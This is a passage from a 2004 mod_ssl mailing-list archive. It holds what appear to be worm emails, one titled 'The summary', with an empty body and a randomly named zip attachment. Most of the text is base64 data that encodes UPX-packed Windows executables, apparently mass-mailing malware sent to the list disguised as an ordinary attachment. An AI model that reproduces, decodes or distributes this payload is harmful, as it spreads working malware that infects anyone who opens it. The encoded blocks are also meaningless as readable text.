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
OYo5rTm+Occ54DnvOfo5Azoh////5To4Ol06aDqJOqk6yzrvOhw7Lzs+O1c7XDthO/f///+F
O507wDtLPF48aDwvPTk9Qz1IPWs9iD2XPaE9eF8g2CKGWEcLMoYy/////6EyqjK1Mt4y5DLs
MgkzTTOiM9Iz5TPrMxA0/zQYNco1/////+41mzY1N1k3vDfON9o3DjgrOKc4FjmaO7U8vjzd
PMA930Tz/w8+HD5VPqc+9j4DPzgSzzDVMN/////dMO3PQjGBMaYxsTG6Mcsx0DH+MQ8yKDJ0
NH80jP////803zTuNBE1IzU/NXs1yTWsNrc2wDbONtQ25zb5NiE3J3/3//83MDc5N043ZTdw
N5A3qTevN8M3z3/9NyE4YzjZ/3/D/zj1OAA5CzkdOSofxjlQOnk6izqfOq46ATsH/////zsW
O2c7bDtyO307mzupO8M75jv2OwE8Mjw4PD48RDxK//8N/zxQPFY8XDxiGW48dDx6PIA8hjyM
PJI8mDye/////zykPKo8sDy2PLw8wjzIPM481DzaPOA85jzsPPI8+Dz+///W/zwEPQo9ED0W
PRyWPSg9Lj00PTo9QD1GPUw9fotb/FI9WD1ePRpqPSV2PXw9gv///xttjj2UPZo9oD2mPaw9
sj24Pb49xD3KPdA91j1AauH/3D3iPeg97j30PfqPPh1VkbAIDW6ghIL/gAPf/SH/lev+itGK
kNlflYPZ2gctqoLZ0AJ3KDD3B9giIYT3fT68F0Ao95QDnKY0FPcRIBR8NoUwF2KyAGR0ByD3
dAwoBjdAshwgGKhXEAoCSQz3TNkscmgB63rgs9kgFKciECOUJISCBKcRATYI6GTB4L1gCX7P
CSBgwbKldyAhwbIhu2AmOJCmc4EYYVZqqYh2gDArBXZespwQ0hCbKriy3bQXwhALs5ZV8MDB
pAHcKmAjI2HWCNSOBaAJN4vXoupT4Aj+s+tf3YH6sP8W6NOXK+g/ALe7Ox6jZBEJ6yQOHoM9
NncheA2//zUIIBQgAO9txwUKmScCuVQu1V+sEJv4jIsQ3+4wGu8yMRFUBv87MUYxWjFgMQda
p0CI4lxkFfSCZM0IMycuwEix7mRtX2N5VyMVYNQb4ssBxggqOKKIJEVaFoIJjN0YAQUbxSsG
sW5Q3WMvJG5lQRBFeGkUZEDdviD3Ek0OdWxo2VbxyE7rQRM6itmsWBHzQSgHVaAiQEHNDpCA
ATPqQS2b1g7TomZRJwKKTRjUQA7fAZFBjUHLAbJkUMneAbcMeRNCAbMKRgHss2FQjAltcGkK
bhjUO3Cnk3t+SygV0QrkaW8TCnjvUHlDbGFnvUQlO1HjDQZLFvXjAfJ8SVrQVuRB3ExIBGqM
AhgBMAhVsm5SlHRjc7olVEcB0QxvAIkK1qkKhbOwBGoB9u+Z1EigTghyAYFaCLbTEKjTbDam
ADGhOs02F7Kc5dmMGJE5AQuSiGWzyfTMLM8D+QQAQg8BDmCiXECOXhQqA5AvEsS5bwAEoPm6
qE9kOpAD1SFqtwJXqADEkHJyKs4MDkLU965sG/sGxCwPGckS9FQwownJslIYc8wdQtRsAOvE
an8ovpUnG7TGc5IAAAAAAAAAgAQA/wAAAAAAAAAAYL4AgEAAjb4AkP//V4PN/+sQkJCQkJCQ
igZGiAdHAdt1B4seg+78Edty7bgBAAAAAdt1B4seg+78EdsRwAHbc+91CYseg+78Edtz5DHJ
g+gDcg3B4AiKBkaD8P90dInFAdt1B4seg+78EdsRyQHbdQeLHoPu/BHbEcl1IEEB23UHix6D
7vwR2xHJAdtz73UJix6D7vwR23Pkg8ECgf0A8///g9EBjRQvg/38dg+KAkKIB0dJdffpY///
/5CLAoPCBIkHg8cEg+kEd/EBz+lM////Xon3uVsAAACKB0cs6DwBd/eAPwB18osHil8EZsHo
CMHAEIbEKfiA6+gB8IkHg8cFidji2Y2+AJAAAIsHCcB0PItfBI2EMKSzAAAB81CDxwj/lgi0
AACVigdHCMB03In5V0jyrlX/lgy0AAAJwHQHiQODwwTr4f+WELQAAGHpWmL//wAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAYAAAgAAAAAAAAAAA
AAAAAAAAAQABAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAUAAAAKTAAADoAgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAEAAQAAAHgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAJAAAACQwwAA
FAAAAAAAAAAAAAAAoJAAACgAAAAgAAAAQAAAAAEABAAAAAAAgAIAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA
/wD/AP//AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAACHd3d3d3d3d3d3d3cAAAAAj//////////////3AAAAAI//////////////9w
AAAACP/3d3d3d3d3d3f/cAAAAAj/9///f/d3/3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3
d3d393f/d3//cAAAAAj/9///f/d3d3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3d3d393f/
d3//cCgoKCgoKCgof////3d//3CCgoKCgoKCgn//9/////9wKP///////yh3d3d3d3//cIL/
///4KCiCf//3//9//3Ao8oKCgvKCKH//9///f/9wgvgoKC8oL4J3d3d3d3//cCjygoLygo8o
f//3//9//3CC/ygvKCgvgn//9///f/9wKP/y8oKP/yh3d3d3d3//cIL/LygoKP+Cf//3//9/
/3Ao8vKCgoKPKH//9///f/9wgvgoKPgoL4J3d3d3gAAAACjygo//go8o/////4//eACC////
////gv////+P94AAKCgoKCgoKCh3d3//j3gAAIKCgoKCgoKC/////4eAAAAAAAAI////////
//+IAAAAAAAACP//////////gAAAAAAAAAiIiIiIiIiIiIAAAAD///////////4AAAD+AAAA
/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAMAAAAHAAAAD/4AAB/+AAA/
/gAAf4iTAAAAAAEAAQAgIBAAAQAEAOgCAAABAAAAAAAAAAAAAAAAADDEAAAIxAAAAAAAAAAA
AAAAAAAAPcQAABjEAAAAAAAAAAAAAAAAAABKxAAAIMQAAAAAAAAAAAAAAAAAAFbEAAAoxAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABgxAAAbsQAAH7EAAAAAAAAjMQAAAAAAACaxAAAAAAAAKrE
AAAAAAAAS0VSTkVMMzIuRExMAGFkdmFwaTMyLmRsbABTSEVMTDMyLmRsbAB1c2VyMzIuZGxs
AABMb2FkTGlicmFyeUEAAEdldFByb2NBZGRyZXNzAABFeGl0UHJvY2VzcwAAAFJlZ0Nsb3Nl
S2V5AAAAU2hlbGxFeGVjdXRlQQAAAEZpbmRXaW5kb3dBAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQSwECFAAKAAAAAAAgsVsw
Sh/MnQA+AAAAPgAADAAAAAAAAAAAACAAAAAAAAAAaXdqbXBodXEuZXhlUEsFBgAAAAABAAEA
OgAAACo+AAAAAA==

----------pbikypklogilhylrfrfr--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb 28 04:23:14 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 19873A8971; Sat, 28 Feb 2004 04:23:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from woofie (A052105.N1.Vanderbilt.Edu [129.59.52.105])
	by master.modssl.org (Postfix) with SMTP id 37622A8934
	for ; Sat, 28 Feb 2004 04:23:01 +0100 (CET)
Date: Fri, 27 Feb 2004 21:22:42 -0600
To: modssl-users@modssl.org
Subject: The summary
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------cajwsrwruhoqnsrnivmx"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------cajwsrwruhoqnsrnivmx
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit



----------cajwsrwruhoqnsrnivmx
Content-Type: application/octet-stream; name="abccabbcc.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="daabacbd.zip"

UEsDBAoAAAAAAICqWzBKH8ydAD4AAAA+AAAMAAAAdHZpcWZ1cnAuZXhlTVqQAAMAAAAEAAAA
//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4f
ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAADEoj5LgMNQGIDDUBiAw1AYgMNQGIPDUBgO3EMYr8NQGGjcVRiBw1AYfONCGIHD
UBhHxVYYgcNQGFJpY2iAw1AYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwBCRUBA
AAAAAAAAAADgAA8BCwEFDABAAAAAEAAAAHAAALCwAAAAgAAAAMAAAAAAQAAAEAAAAAIAAAQA
AAAAAAAABAAAAAAAAAAA0AAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA
AAAAAAAAAACkwwAAFAEAAADAAACkAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAABwAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAA
AACAAADgVVBYMQAAAAAAQAAAAIAAAAA0AAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAA
ABAAAADAAAAABgAAADgAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
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
